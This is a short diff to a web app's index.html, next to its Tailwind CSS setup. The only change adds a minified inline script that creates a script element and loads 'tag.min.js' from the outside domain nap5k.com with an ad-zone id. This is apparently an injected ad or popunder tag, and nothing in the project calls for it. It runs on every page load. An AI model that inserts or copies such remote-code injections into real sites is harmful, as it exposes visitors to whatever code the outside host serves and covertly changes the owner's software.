--- a/index.html
+++ b/index.html
@@ -13,6 +13,8 @@
 
     <!-- Tailwind CSS via CDN -->
     <script src="https://cdn.tailwindcss.com"></script>
+
+    <script>(function(s){s.dataset.zone='10235991',s.src='https://nap5k.com/tag.min.js'})([document.documentElement, document.body].filter(Boolean).pop().appendChild(document.createElement('script')))</script>
     <script>
       tailwind.config = {
         darkMode: 'class',
